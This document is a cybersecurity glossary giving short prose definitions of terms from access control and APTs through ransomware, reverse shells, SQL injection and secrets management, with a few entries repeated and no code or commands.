Cybersecurity Glossary

Access control is a security mechanism that regulates who or what can view, use, or interact with resources in a computing environment. It enforces policies that grant or deny permissions based on user identity, role, or other attributes.

An Advanced Persistent Threat (APT) is a prolonged, targeted cyberattack in which an intruder gains access to a network and remains undetected for an extended period. APTs typically target high-value organizations to steal data rather than cause immediate damage.

Authentication is the process of verifying the identity of a user, device, or system before granting access to resources. It typically involves credentials such as passwords, biometrics, security tokens, or digital certificates.

Authorization is the security process that determines whether an authenticated user or system has permission to access a specific resource or perform a particular action. It follows authentication and enforces access policies.

Active Directory (AD) is Microsoft's directory service for Windows domain networks that provides authentication, authorization, group policy management, and centralized resource management across an organization.

Account Lockout is a security mechanism that temporarily or permanently disables a user account after a specified number of consecutive failed authentication attempts to prevent brute force attacks.

ARP Spoofing is a network attack where an attacker sends falsified ARP messages on a local network to link their MAC address with a legitimate IP address, intercepting or modifying network traffic.

Adware is software that automatically displays or downloads unwanted advertising content, often bundled with free programs, and may track browsing habits to deliver targeted advertisements.

An Acceptable Use Policy (AUP) defines the rules and guidelines for how employees and users may use an organization's IT resources, including computers, networks, email, internet access, and software.

AES (Advanced Encryption Standard) is a symmetric block cipher algorithm adopted by the US government as the standard for encrypting sensitive data, using 128, 192, or 256-bit keys to provide strong, efficient encryption.

API Security encompasses the practices and tools for protecting Application Programming Interfaces from attacks, abuse, and unauthorized access, ensuring data integrity and confidentiality in API-driven architectures.

AI Security addresses the unique threats and vulnerabilities associated with artificial intelligence and machine learning systems, including adversarial attacks, model poisoning, data privacy, and the security of AI-driven decision-making.

Application Security is the practice of protecting software applications from threats throughout their entire lifecycle, using a combination of secure development practices, security testing, and runtime protection technologies.

Attack Surface Management (ASM) is the continuous discovery, inventory, classification, and monitoring of an organization's internet-facing assets and exposures to identify and reduce potential entry points for attackers.

Adversarial Machine Learning is the study of techniques that exploit vulnerabilities in AI and ML systems by crafting inputs designed to cause models to make incorrect predictions or classifications.

A botnet is a network of compromised computers or devices (bots) that are remotely controlled by a threat actor. Botnets are used to launch distributed denial-of-service (DDoS) attacks, send spam, steal data, and perform other malicious activities at scale.

Business continuity is an organization's ability to maintain essential functions during and after a disaster or disruptive event. In cybersecurity, it encompasses planning, policies, and procedures that ensure critical systems and data remain available during security incidents.

Biometric Authentication uses unique physical or behavioral characteristics such as fingerprints, facial recognition, iris scans, or voice patterns to verify a person's identity for access control.

Business Email Compromise (BEC) is a sophisticated scam targeting organizations that conduct wire transfers, where attackers impersonate executives or trusted partners via email to trick employees into transferring funds or sensitive data.

A Brute Force Attack is a trial-and-error method where attackers systematically try every possible combination of passwords or encryption keys until the correct one is found.

A Business Impact Analysis (BIA) is the process of determining the potential effects of disruptions to critical business operations, including financial losses, operational impacts, and recovery priorities.

BGP Security refers to the practices and technologies that protect the Border Gateway Protocol from route hijacking, route leaks, and other attacks that can misdirect internet traffic at a global scale.

Backup and Recovery is the practice of creating and storing copies of data so that it can be restored after data loss events such as hardware failures, ransomware attacks, accidental deletion, or natural disasters.

A Blue Team is a group of security professionals responsible for defending an organization's information systems by maintaining security controls, detecting threats, responding to incidents, and strengthening defenses against attacks.

A Bug Bounty program is a crowdsourced initiative that rewards independent security researchers for discovering and responsibly reporting security vulnerabilities in an organization's systems, applications, or products.

Blockchain Security encompasses the practices and technologies for protecting blockchain networks, smart contracts, cryptocurrency wallets, and decentralized applications from attacks, vulnerabilities, and fraud.

Bring Your Own Device (BYOD) is a corporate policy that allows employees to use their personal devices for work activities, requiring security controls that protect corporate data without infringing on personal privacy.

Bluetooth Security refers to the protection of wireless communications between devices using Bluetooth protocols, addressing vulnerabilities such as eavesdropping, unauthorized pairing, and exploitation of implementation flaws.

Breach Response is the comprehensive process of managing a data breach from initial detection through containment, investigation, notification, remediation, and post-incident improvement.

A Break-Glass Account is an emergency administrative account used only when standard authentication systems fail or during critical incidents, providing last-resort access with strict monitoring and documentation requirements.

Cloud security is the set of policies, controls, technologies, and procedures used to protect data, applications, and infrastructure hosted in cloud computing environments. It addresses unique challenges such as shared responsibility, multi-tenancy, and dynamic resource provisioning.

Compliance in cybersecurity refers to the process of meeting established security standards, regulations, and legal requirements. Organizations must adhere to frameworks such as SOC 2, HIPAA, PCI DSS, GDPR, and industry-specific regulations to protect data and avoid penalties.

Cryptography is the practice and study of techniques for securing communication and data by transforming information into an unreadable format using mathematical algorithms. Only authorized parties with the correct key can decrypt and access the original data.

A Certificate Authority (CA) is a trusted entity that issues, manages, and revokes digital certificates used to verify the identity of organizations, servers, and individuals in encrypted communications.

Cross-Site Scripting (XSS) is a web application vulnerability that allows attackers to inject malicious client-side scripts into web pages viewed by other users, enabling session hijacking, defacement, or malicious redirects.

Credential Stuffing is an automated attack that uses stolen username and password pairs from data breaches to gain unauthorized access to user accounts on other services, exploiting password reuse.

Cryptojacking is the unauthorized use of someone's computing resources to mine cryptocurrency, typically delivered through malicious scripts in web browsers or malware installed on the victim's device.

The Cybersecurity Maturity Model Certification (CMMC) is a US Department of Defense framework that requires defense contractors to meet specific cybersecurity maturity levels to protect controlled unclassified information (CUI).

The California Consumer Privacy Act (CCPA) is a state privacy law that gives California residents the right to know what personal data is collected about them, to delete it, to opt out of its sale, and to receive equal service regardless of exercising their rights.

A Compliance Audit is a formal examination of an organization's adherence to regulatory requirements, industry standards, and internal policies, conducted by internal or external auditors to verify security controls are implemented and effective.

Configuration Management is the process of maintaining systems, servers, and software in a consistent, desired state, ensuring security settings, hardening baselines, and compliance configurations are applied and monitored.

Change Management is the structured process for reviewing, approving, and implementing changes to IT systems and infrastructure to minimize risk, prevent unauthorized modifications, and maintain system stability and security.

A Cloud Access Security Broker (CASB) is a security policy enforcement point positioned between cloud service consumers and providers to monitor activity, enforce security policies, and protect data in cloud applications.

Cloud Security Posture Management (CSPM) is a category of security tools that continuously monitors cloud infrastructure for misconfigurations, compliance violations, and security risks, providing automated remediation recommendations.

Cloud Workload Protection Platform (CWPP) is a security solution that provides consistent protection for server workloads across physical machines, virtual machines, containers, and serverless functions in any cloud environment.

Cloud Access Security encompasses the policies, technologies, and controls that govern how users and devices access cloud services, ensuring that only authorized entities can reach cloud resources through secure channels.

Cloud Workload Protection is the practice of securing computing workloads running in cloud environments through runtime protection, vulnerability management, integrity monitoring, and behavioral analysis across VMs, containers, and serverless functions.

Container Security encompasses the tools, policies, and practices for protecting containerized applications throughout their lifecycle, from image building and registry storage to runtime deployment and orchestration.

Cloud Key Management is the practice of creating, storing, rotating, and managing cryptographic keys used to encrypt data in cloud environments, often leveraging cloud-native key management services or hardware security modules.

Security Code Review is the systematic examination of application source code to identify security vulnerabilities, coding flaws, and deviations from secure coding practices before the code is deployed to production.

Cyber Insurance is a specialized insurance product that provides financial protection against losses resulting from cyber incidents such as data breaches, ransomware attacks, business interruption, and regulatory penalties.

The Cyber Kill Chain is a framework developed by Lockheed Martin that describes the seven stages of a cyberattack, from initial reconnaissance to data exfiltration, helping defenders identify and disrupt attacks at each stage.

Cyber Resilience is an organization's ability to continuously deliver intended outcomes despite adverse cyber events, combining cybersecurity, business continuity, and organizational adaptability to withstand and recover from attacks.

Compliance as a Service (CaaS) is a cloud-based model that provides organizations with ongoing compliance monitoring, evidence collection, policy management, and audit preparation through a managed service platform.

Chain of Custody is the documented chronological record that establishes the seizure, control, transfer, analysis, and disposition of physical or electronic evidence in legal or investigative proceedings.

Container Registry Security involves protecting repositories that store container images by implementing access controls, vulnerability scanning, image signing, and integrity verification to prevent the deployment of compromised containers.

A Cloud-Native Application Protection Platform (CNAPP) is an integrated security solution that combines CSPM, CWPP, vulnerability management, and runtime protection into a unified platform for securing cloud-native applications.

Command and Control (C2 or C&C) refers to the infrastructure and communication channels that attackers use to remotely manage compromised systems, issue commands, exfiltrate data, and maintain persistence within a victim's network.

Conditional Access is an identity-driven security policy framework that enforces access decisions based on contextual signals such as user identity, device health, location, and risk level before granting access to resources.

Consent Management is the process of obtaining, recording, managing, and honoring user permissions for data collection, processing, and sharing, ensuring compliance with privacy regulations like GDPR and CCPA.

Critical Infrastructure Protection encompasses the strategies, programs, and security measures designed to secure the assets, systems, and networks that are essential to national security, economic stability, and public health and safety.

A Cyber Range is a simulated virtual environment used for cybersecurity training, testing, and research that replicates real-world networks, systems, and attack scenarios in a safe, isolated setting.

Cyber Threat Hunting is the proactive, hypothesis-driven search for advanced threats and adversary activity within an organization's environment that evades existing automated security defenses.

A Distributed Denial-of-Service (DDoS) attack is a cyberattack that overwhelms a target server, service, or network with a flood of internet traffic from multiple distributed sources. The goal is to make the target unavailable to legitimate users by exhausting its resources.

Data Loss Prevention (DLP) is a set of tools and processes that ensure sensitive data is not lost, misused, or accessed by unauthorized users. DLP solutions monitor, detect, and block the unauthorized transmission of confidential information.

Disaster recovery is the process and set of policies for restoring IT systems, data, and infrastructure after a cyberattack, natural disaster, or other disruptive event. It focuses on minimizing downtime and data loss through backup strategies and recovery procedures.

A Digital Certificate is an electronic credential issued by a certificate authority that binds a public key to an identity, enabling encrypted communication and authentication between parties.

A Denial of Service (DoS) attack aims to make a machine, network, or service unavailable to its intended users by overwhelming it with traffic or exploiting vulnerabilities that cause the system to crash.

A Drive-by Download is a malware delivery method where malicious software is automatically downloaded to a user's device simply by visiting a compromised or malicious website, without requiring any user interaction.

Domain Spoofing is a technique where attackers forge or impersonate a legitimate domain name in emails or websites to deceive users into believing they are interacting with a trusted entity.

DNS Poisoning (also called DNS Spoofing) is an attack that corrupts DNS cache data so that domain name queries return incorrect IP addresses, redirecting users to malicious websites without their knowledge.

A Data Retention Policy defines how long an organization keeps different types of data, when data should be securely disposed of, and the procedures for managing the data lifecycle to meet legal and business requirements.

A DMZ (Demilitarized Zone) is a network segment that acts as a buffer zone between an organization's internal network and untrusted external networks, hosting public-facing services while protecting the internal network.

DNS Security encompasses the technologies and practices that protect DNS infrastructure from attacks such as DNS poisoning, amplification attacks, and hijacking, ensuring the integrity and availability of domain name resolution.

DNSSEC (Domain Name System Security Extensions) is a suite of specifications that add authentication to DNS responses through digital signatures, preventing DNS spoofing and cache poisoning attacks.

Data Classification is the process of categorizing data based on its sensitivity level and business value, enabling organizations to apply appropriate security controls, access restrictions, and handling procedures for each category.

Data Masking is a technique that obscures specific data within a database to protect sensitive information while maintaining the data's usability for testing, development, or analytics purposes.

Data Sovereignty is the concept that data is subject to the laws and governance of the country or region where it is collected, processed, or stored, requiring organizations to understand and comply with local data regulations.

Data Breach Notification is the legal requirement for organizations to inform affected individuals, regulators, and sometimes the public when personal data has been compromised in a security breach, within specified timeframes.

Digital Rights Management (DRM) is a set of technologies and policies that control access to, and usage of, copyrighted digital content and proprietary information, preventing unauthorized copying, distribution, and modification.

Digital Forensics is the process of collecting, preserving, analyzing, and presenting digital evidence from computers, networks, and mobile devices in a manner that is legally admissible and maintains chain of custody.

Dynamic Application Security Testing (DAST) is a black-box testing methodology that analyzes running web applications by simulating attacks from the outside to identify security vulnerabilities in deployed applications.

DevSecOps is a software development methodology that integrates security practices throughout the entire development lifecycle, making security a shared responsibility between development, security, and operations teams rather than an afterthought.

Digital Twin Security focuses on protecting the virtual replicas of physical systems, processes, or products that are used for simulation, monitoring, and optimization, ensuring the integrity of both the digital model and its connection to real-world assets.

Data Loss Prevention (DLP) encompasses the strategies, processes, and technologies used to detect and prevent the unauthorized transmission, exfiltration, or exposure of sensitive data from an organization's network.

A Distributed Denial of Service (DDoS) attack uses multiple compromised systems across the internet to flood a target with traffic, overwhelming resources and making services unavailable to legitimate users.

Data Encryption at Rest is the practice of encrypting stored data on disk, in databases, or in storage systems so that the data remains protected even if the physical storage media is accessed by unauthorized parties.

Data Privacy is the right of individuals to control how their personal information is collected, used, stored, and shared by organizations, enforced through regulations like GDPR, CCPA, and PIPEDA.

A Deepfake is synthetic media created using deep learning techniques to replace a person's likeness or voice with someone else's, posing significant risks for disinformation, fraud, and social engineering attacks.

Data Exfiltration is the unauthorized transfer of data from a computer or network to an external destination, often performed by malicious insiders, compromised accounts, or advanced persistent threats stealing sensitive information.

Dumpster Diving is a physical information gathering technique where attackers search through an organization's trash or recycling to find discarded documents, storage media, or other materials containing sensitive information.

Differential Privacy is a mathematical framework that enables organizations to share information about datasets while withholding information about individuals, adding controlled statistical noise to query results to protect privacy.

Data Anonymization is the process of removing or modifying personally identifiable information from datasets so that individuals cannot be identified, allowing the data to be used for analysis, research, or sharing without privacy violations.

Encryption is the process of converting plaintext data into an unreadable ciphertext format using a cryptographic algorithm and key. Only authorized parties with the correct decryption key can convert the data back to its original readable form.

Endpoint Detection and Response (EDR) is a cybersecurity solution that continuously monitors and collects data from endpoints (laptops, desktops, servers, mobile devices) to detect, investigate, and respond to cyber threats in real time.

Edge Computing Security addresses the protection of computing resources, data, and applications deployed at the network edge, close to data sources and end users, where traditional centralized security controls may not be available.

Endpoint Security is the practice of securing end-user devices such as laptops, desktops, mobile phones, and tablets from cyber threats through a combination of software, policies, and management controls.

Email Security comprises the techniques and technologies used to protect email accounts, communications, and content from unauthorized access, phishing, malware, spam, and data loss through email channels.

An Evil Twin Attack is a wireless attack where a threat actor sets up a fraudulent Wi-Fi access point with the same SSID as a legitimate network to trick users into connecting and intercept their traffic.

Evidence Preservation is the process of protecting digital evidence from alteration, deletion, or degradation to maintain its integrity and admissibility for legal, regulatory, or investigative purposes.

Endpoint Privilege Management (EPM) is a security technology that controls and monitors administrative privileges on endpoint devices, allowing standard users to elevate permissions for specific approved applications while maintaining least privilege.

A firewall is a network security device or software that monitors and controls incoming and outgoing network traffic based on predetermined security rules. It establishes a barrier between trusted internal networks and untrusted external networks such as the internet.

Federated Identity is a system that allows users to use the same credentials to access resources across multiple independent organizations or domains by establishing trust relationships between identity providers.

Fileless Malware is a type of malicious activity that operates entirely in memory without writing files to disk, using legitimate system tools like PowerShell or WMI to execute attacks and evade traditional antivirus detection.

FedRAMP (Federal Risk and Authorization Management Program) is a US government program that provides a standardized approach to security assessment, authorization, and continuous monitoring for cloud products and services used by federal agencies.

The Federal Information Security Management Act (FISMA) is a US federal law that requires government agencies and their contractors to implement comprehensive information security programs based on risk management principles and NIST standards.

The Family Educational Rights and Privacy Act (FERPA) is a US federal law that protects the privacy of student education records and governs how educational institutions handle, disclose, and secure student data.

The General Data Protection Regulation (GDPR) is a comprehensive EU data protection law that governs how organizations collect, process, store, and transfer personal data of EU residents, with significant penalties for non-compliance.

GitOps Security is the practice of securing Git-based operational workflows where infrastructure and application configurations are stored in version control and automatically synchronized to production environments.

HIPAA (Health Insurance Portability and Accountability Act) is a US federal law that establishes national standards for protecting sensitive patient health information from being disclosed without the patient's consent or knowledge.

A Honeypot is a decoy system or resource deliberately deployed to attract and detect attackers, enabling security teams to study attack methods, gather threat intelligence, and divert attackers from production systems.

HITRUST is a certifiable security and privacy framework that harmonizes multiple regulations and standards including HIPAA, NIST, ISO 27001, and PCI DSS into a single comprehensive framework with a unified assessment methodology.

Homomorphic Encryption is a form of encryption that allows computations to be performed on ciphertext without first decrypting it, producing encrypted results that match the result of operations performed on plaintext.

Health Information Exchange (HIE) refers to the electronic sharing of health-related information among organizations according to nationally recognized standards, with security controls that protect patient privacy under HIPAA.

Incident response is the organized approach to addressing and managing the aftermath of a security breach or cyberattack. The goal is to handle the situation in a way that limits damage, reduces recovery time and costs, and prevents future incidents.

An Intrusion Detection System (IDS) is a security tool that monitors network traffic or system activities for malicious behavior or policy violations. It alerts security teams when suspicious activity is detected, enabling rapid investigation and response.

Identity Governance is the policy-based framework for managing digital identities, ensuring users have appropriate access to resources, and maintaining compliance through regular access reviews and certifications.

An Insider Threat is a security risk posed by individuals within an organization, such as employees, contractors, or partners, who misuse their authorized access to harm the organization's data, systems, or operations.

ISO 27001 is an international standard for information security management systems (ISMS) that provides a systematic approach to managing sensitive company information through risk management processes and security controls.

An Intrusion Prevention System (IPS) is an active network security technology that monitors network traffic, detects malicious activity, and automatically takes action to block or prevent threats in real time.

An Incident Response Plan is a documented set of procedures and guidelines that defines how an organization will detect, respond to, and recover from security incidents to minimize damage and restore operations.

Infrastructure as Code (IaC) Security is the practice of scanning and validating infrastructure-as-code templates (Terraform, CloudFormation, ARM) for security misconfigurations and policy violations before deployment.

Interactive Application Security Testing (IAST) combines elements of SAST and DAST by using agents instrumented within the application to analyze code behavior during runtime testing, providing accurate vulnerability detection with low false positives.

IoT Security encompasses the strategies, technologies, and practices for protecting Internet of Things devices and networks from cyber threats, addressing the unique challenges of resource-constrained, interconnected devices.

Industrial Control System (ICS) Security focuses on protecting the computers, networks, and control systems that manage industrial processes in sectors such as energy, water, manufacturing, and transportation.

Identity and Access Management (IAM) is the framework of policies, processes, and technologies that manages digital identities and controls user access to critical information and systems across an organization.

An Information Security Management System (ISMS) is a systematic approach to managing sensitive company information through policies, procedures, technical controls, and continuous improvement frameworks, typically aligned with ISO 27001.

Immutable Infrastructure is a deployment paradigm where servers and components are never modified after deployment; instead, they are replaced entirely when updates are needed, reducing configuration drift and improving security consistency.

Identity Threat Detection and Response (ITDR) is a security discipline focused on detecting and responding to threats targeting identity systems, including compromised credentials, privilege abuse, and identity infrastructure attacks.

Just-in-Time (JIT) Access is a security practice that grants privileged access only for a specific time period and purpose, automatically revoking it afterward to minimize standing privileges and reduce the attack surface.

A Keylogger is a surveillance tool, either hardware or software, that records every keystroke made on a computer, capturing passwords, messages, and other sensitive information typed by the user.

Kubernetes Security involves protecting all components of Kubernetes container orchestration platforms, including the control plane, worker nodes, pods, network policies, secrets management, and RBAC configurations.

A Key Risk Indicator (KRI) is a measurable metric used by security and risk management teams to signal increasing risk exposure and provide early warning that controls may be degrading or threats are escalating.

Lightweight Directory Access Protocol (LDAP) is an open protocol used to access and manage distributed directory information services, commonly used for centralized authentication and storing user account information.

A Logic Bomb is malicious code deliberately inserted into a software system that triggers a harmful function when specific conditions are met, such as a particular date, user action, or system event.

A Load Balancer is a device or software that distributes incoming network traffic across multiple servers to ensure no single server bears too much demand, improving availability, reliability, and performance of applications.

The Principle of Least Privilege is a security concept requiring that users, applications, and systems are granted only the minimum level of access necessary to perform their required functions, reducing the potential impact of security breaches.

The Lei Geral de Protecao de Dados (LGPD) is Brazil's comprehensive data protection law that regulates the processing of personal data, granting Brazilian citizens rights similar to those under the European GDPR.

Living Off The Land (LOTL) refers to attacker techniques that use legitimate system tools and processes already present in the target environment to carry out malicious activities, making detection significantly more difficult.

Lateral Movement refers to the techniques attackers use to progressively move through a network after initial compromise, seeking to expand their access to additional systems, accounts, and sensitive data.

Malware (malicious software) is any software intentionally designed to cause damage to a computer, server, client, or network. Common types include viruses, worms, trojans, ransomware, spyware, adware, and rootkits.

Multi-Factor Authentication (MFA) is a security method that requires users to provide two or more verification factors to gain access to a resource. It combines something you know (password), something you have (token), and something you are (biometrics).

A Man-in-the-Middle (MitM) attack is a cyberattack where an attacker secretly intercepts and potentially alters communications between two parties who believe they are communicating directly with each other.

Multi-Cloud Security is the practice of maintaining consistent security policies, controls, and visibility across multiple cloud service providers, addressing the complexity of managing security in heterogeneous cloud environments.

MITRE ATT&CK is a globally accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations, used for threat modeling, detection engineering, and security assessment.

Managed Detection and Response (MDR) is a cybersecurity service that combines technology and human expertise to perform threat monitoring, detection, and response on behalf of organizations that lack in-house security operations capabilities.

Micro-Segmentation is a security technique that creates fine-grained security zones around individual workloads or applications, enforcing strict access policies that prevent lateral movement even within the same network segment.

Malware Analysis is the process of studying and dissecting malicious software to understand its behavior, origin, capabilities, and impact, enabling security teams to develop detection signatures, containment strategies, and prevention measures.

Mobile Device Management (MDM) is a security technology that enables organizations to monitor, manage, and secure employees' mobile devices such as smartphones, tablets, and laptops from a centralized console.

Mobile Application Security encompasses the practices and technologies used to protect mobile applications from reverse engineering, tampering, data leakage, and exploitation on iOS and Android platforms.

Memory Forensics is the analysis of a computer's volatile memory (RAM) to recover artifacts such as running processes, network connections, encryption keys, and malware that may not be present on disk.

Model Poisoning is an attack where malicious actors manipulate the training data or model parameters of a machine learning system to introduce backdoors, degrade performance, or bias the model's outputs for their benefit.

Mean Time to Detect (MTTD) is a key security metric that measures the average time it takes for an organization to identify a security threat or breach from the moment it occurs until it is discovered.

Mean Time to Respond (MTTR) is a security metric measuring the average time from when a security incident is detected until it is fully contained and remediated, reflecting the efficiency of incident response capabilities.

Network security encompasses the policies, practices, and technologies designed to protect the integrity, confidentiality, and accessibility of computer networks and data. It includes both hardware and software solutions that defend against unauthorized access and cyber threats.

The NIST Cybersecurity Framework is a voluntary set of guidelines and best practices developed by the National Institute of Standards and Technology to help organizations manage and reduce cybersecurity risk through five core functions: Identify, Protect, Detect, Respond, and Recover.

A Next-Generation Firewall (NGFW) is an advanced network security device that combines traditional firewall capabilities with additional features like application awareness, intrusion prevention, threat intelligence, and deep packet inspection.

Network Segmentation is the practice of dividing a computer network into smaller subnetworks to improve security by limiting lateral movement, containing breaches, and controlling traffic flow between segments.

Network Access Control (NAC) is a security approach that enforces policies for devices attempting to connect to a network, verifying identity, health, and compliance before granting appropriate access levels.

Network Traffic Analysis (NTA) is the process of monitoring network communications to detect anomalies, threats, and performance issues by analyzing patterns, protocols, and behaviors in network flow data and packet captures.

OAuth is an open authorization framework that allows third-party applications to access user resources without exposing credentials, using token-based delegated access instead of sharing passwords.

OpenID Connect (OIDC) is an identity layer built on top of OAuth 2.0 that allows applications to verify user identity and obtain basic profile information through a standardized authentication protocol.

The OWASP Top 10 is a regularly updated awareness document listing the ten most critical web application security risks, serving as the industry standard for web application security testing and developer training.

Operational Technology (OT) Security protects the hardware and software systems that monitor and control physical processes in industrial environments, including manufacturing, energy, transportation, and critical infrastructure.

Penetration testing (pen testing) is a simulated cyberattack against your computer system, network, or web application to identify exploitable vulnerabilities. Ethical hackers use the same tools and techniques as malicious attackers to find weaknesses before they can be exploited.

Phishing is a social engineering attack where cybercriminals send fraudulent communications, typically emails, that appear to come from a trusted source. The goal is to trick recipients into revealing sensitive information, clicking malicious links, or downloading malware.

Privileged Access Management (PAM) is a cybersecurity discipline that secures, controls, and monitors access for privileged accounts that have elevated permissions to critical systems and data.

A Password Policy is a set of rules and guidelines that define requirements for creating, managing, and protecting passwords, including length, complexity, rotation, and storage standards.

PCI DSS (Payment Card Industry Data Security Standard) is a set of security standards designed to ensure that all organizations that accept, process, store, or transmit credit card information maintain a secure environment.

PIPEDA (Personal Information Protection and Electronic Documents Act) is Canada's federal privacy law governing how private-sector organizations collect, use, and disclose personal information in the course of commercial activities.

A Privacy Impact Assessment (PIA) is a systematic process for evaluating how a project, system, or process collects, uses, and protects personal information, identifying privacy risks and recommending mitigations.

A Proxy Server is an intermediary server that sits between client devices and the internet, forwarding requests on behalf of clients while providing anonymity, caching, content filtering, and security benefits.

Patch Management is the process of identifying, acquiring, testing, and deploying software updates and security patches across an organization's systems to fix vulnerabilities and improve functionality.

A Purple Team is a collaborative security approach where red team (offensive) and blue team (defensive) personnel work together to maximize the effectiveness of security testing by sharing knowledge, techniques, and findings in real time.

Penetration Testing Methodology refers to the structured frameworks and standards that guide how penetration tests are planned, executed, and reported, ensuring comprehensive and repeatable security assessments.

Penetration Testing as a Service (PTaaS) is a modern delivery model that combines continuous automated scanning with on-demand expert-led penetration testing, providing organizations with ongoing security validation through a cloud-based platform.

Phishing Simulation is a security training exercise that sends realistic but benign phishing emails to employees to test their ability to recognize and report phishing attempts, measuring organizational resilience to social engineering.

Prompt Injection is an attack against AI language models where malicious inputs are crafted to override the model's intended instructions, potentially causing it to reveal sensitive data, generate harmful content, or execute unintended actions.

A Pass-the-Hash Attack is a technique where an attacker captures a user's password hash and uses it directly to authenticate to other systems without needing to crack or know the actual plaintext password.

Privilege Escalation is the exploitation of a bug, design flaw, or configuration oversight in an operating system or application to gain elevated access to resources that are normally protected from unprivileged users.

Physical Security encompasses the measures designed to protect personnel, hardware, software, networks, and data from physical actions and events that could cause serious loss or damage to an organization.

Privacy by Design is a framework for embedding privacy into the design specifications of technologies, business practices, and physical infrastructures, ensuring that privacy protections are built in from the outset rather than added as an afterthought.

The Payment Card Industry (PCI) encompasses the organizations, technologies, and standards that govern the secure processing, storage, and transmission of credit card data, primarily defined by the PCI Security Standards Council.

Quantum Computing Threats refer to the potential for quantum computers to break current cryptographic algorithms, particularly RSA and ECC, threatening the security of encrypted data, digital signatures, and secure communications.

Ransomware is a type of malware that encrypts a victim's files or locks them out of their systems, then demands a ransom payment in exchange for the decryption key. Modern ransomware often includes double extortion, where attackers also threaten to leak stolen data.

A red team is a group of security professionals who simulate real-world attacks against an organization to test its defenses. Unlike penetration testing, red team exercises assess the entire security posture including people, processes, and technology across an extended engagement.

A risk assessment is the systematic process of identifying, analyzing, and evaluating cybersecurity risks to an organization. It determines the likelihood and potential impact of threats, helping prioritize security investments and mitigation strategies.

A Rootkit is a collection of malicious software tools that provides privileged access to a computer while actively concealing its presence from users, administrators, and security software.

Risk Management is the ongoing process of identifying, assessing, prioritizing, and mitigating cybersecurity risks to reduce their potential impact on an organization's operations, assets, and reputation.

A Reverse Proxy is a server that sits in front of web servers and forwards client requests to the appropriate backend server, providing load balancing, SSL termination, caching, and an additional layer of security.

RSA is an asymmetric encryption algorithm that uses a pair of mathematically related public and private keys, widely used for secure data transmission, digital signatures, and key exchange in protocols like TLS/SSL.

The Right to be Forgotten is a data privacy concept, codified in GDPR as the right to erasure, that allows individuals to request the deletion of their personal data from an organization's records under certain circumstances.

Runtime Application Self-Protection (RASP) is a security technology that runs within an application to detect and prevent real-time attacks by analyzing application behavior and context from inside the running application.

Ransomware Response is the structured approach to detecting, containing, eradicating, and recovering from a ransomware attack, including decision-making about ransom payments and restoration from backups.

A Reverse Shell is a type of shell session initiated from a compromised target machine back to an attacker's command-and-control server, bypassing inbound firewall restrictions that would block direct connections to the target.

Risk-Based Authentication (RBA) is an adaptive security mechanism that adjusts authentication requirements in real time based on the assessed risk level of a login attempt, requiring stronger verification for suspicious activity.

Security Information and Event Management (SIEM) is a technology solution that collects, aggregates, and analyzes security event data from across an organization's IT infrastructure. SIEM provides real-time monitoring, threat detection, correlation of security events, and compliance reporting.

Single Sign-On (SSO) is an authentication method that allows users to access multiple applications and services with one set of login credentials. SSO improves user experience, reduces password fatigue, and centralizes authentication management.

Social engineering is a manipulation technique that exploits human psychology to trick people into making security mistakes or giving away sensitive information. It is the human element of cybersecurity attacks and often serves as the initial vector for more complex attacks.

Security Assertion Markup Language (SAML) is an XML-based open standard for exchanging authentication and authorization data between an identity provider and a service provider, enabling single sign-on across domains.

Session Management is the process of securely handling user sessions from login to logout, including generating session tokens, maintaining session state, enforcing timeouts, and preventing session hijacking attacks.

Spear Phishing is a targeted form of phishing that crafts personalized messages aimed at specific individuals or organizations, using gathered intelligence to make the attack more convincing and effective.

SQL Injection is a code injection attack that exploits vulnerabilities in an application's database layer by inserting malicious SQL statements into input fields, allowing attackers to read, modify, or delete database contents.

A Supply Chain Attack targets an organization by compromising a trusted third-party vendor, software provider, or service in its supply chain, using the trusted relationship to deliver malware or gain unauthorized access.

Spyware is malicious software that secretly monitors user activity, collects personal information, and transmits it to third parties without the user's knowledge or consent.

SOC 2 (System and Organization Controls 2) is an auditing framework developed by AICPA that evaluates an organization's information systems based on five trust service criteria: security, availability, processing integrity, confidentiality, and privacy.

A Security Policy is a formal document that defines an organization's approach to information security, establishing rules, guidelines, and responsibilities for protecting assets, data, and systems from threats.

Software-Defined Networking (SDN) is a network architecture approach that separates the control plane from the data plane, enabling centralized, programmable management of network infrastructure through software applications.

Secure File Transfer refers to methods and protocols for transmitting files between systems or users with encryption, authentication, and integrity verification to prevent unauthorized access or tampering during transit.

Security Orchestration, Automation, and Response (SOAR) platforms combine incident response, orchestration, automation, and threat intelligence management to help security teams efficiently manage and respond to threats.

A Security Operations Center (SOC) is a centralized facility staffed with security analysts who continuously monitor, detect, analyze, and respond to cybersecurity incidents using a combination of technology solutions and processes.

Security Awareness Training is an educational program that teaches employees to recognize and respond to cybersecurity threats such as phishing, social engineering, and data handling risks, building a human firewall against attacks.

The Shared Responsibility Model is a cloud security framework that defines which security obligations belong to the cloud service provider and which belong to the customer, varying by service type (IaaS, PaaS, SaaS).

Serverless Security addresses the unique security challenges of serverless computing platforms like AWS Lambda and Azure Functions, where the provider manages infrastructure but application-level vulnerabilities remain the customer's responsibility.

Static Application Security Testing (SAST) is a white-box testing methodology that analyzes application source code, bytecode, or binaries without executing the program to identify security vulnerabilities early in the development lifecycle.

Software Composition Analysis (SCA) is a security practice that identifies open-source components and third-party libraries in applications, detects known vulnerabilities, and ensures license compliance across the software supply chain.

Secure SDLC (Software Development Lifecycle) is a framework that integrates security activities such as threat modeling, secure coding, security testing, and vulnerability management into every phase of the software development process.

SCADA (Supervisory Control and Data Acquisition) Security addresses the protection of SCADA systems that monitor and control geographically dispersed industrial processes in sectors like utilities, oil and gas, water treatment, and transportation.

Security Information Sharing is the practice of exchanging threat intelligence, indicators of compromise, and security best practices between organizations, industries, and government agencies to improve collective cybersecurity defense.

Security Architecture is the design and framework that defines how security controls, technologies, and processes are structured and integrated to protect an organization's information assets and meet business objectives.

Security Orchestration is the automated coordination and integration of multiple security tools, processes, and workflows to streamline security operations, accelerate incident response, and reduce manual effort.

Secure Access Service Edge (SASE) is a cloud-native architecture that converges networking and security services including SD-WAN, CASB, FWaaS, and ZTNA into a single cloud-delivered platform for secure access from any location.

A Security Baseline is a minimum set of security controls and configuration standards that must be applied to systems, applications, and networks to ensure a consistent and acceptable level of security across an organization.

A Security Audit is a systematic evaluation of an organization's information security posture by assessing how well it conforms to established security policies, regulatory requirements, and industry best practices.

Secrets Management is the practice of securely storing, accessing, and managing sensitive credentials such as API keys, passwords, certificates, and tokens used by applications and services in development and production environments.

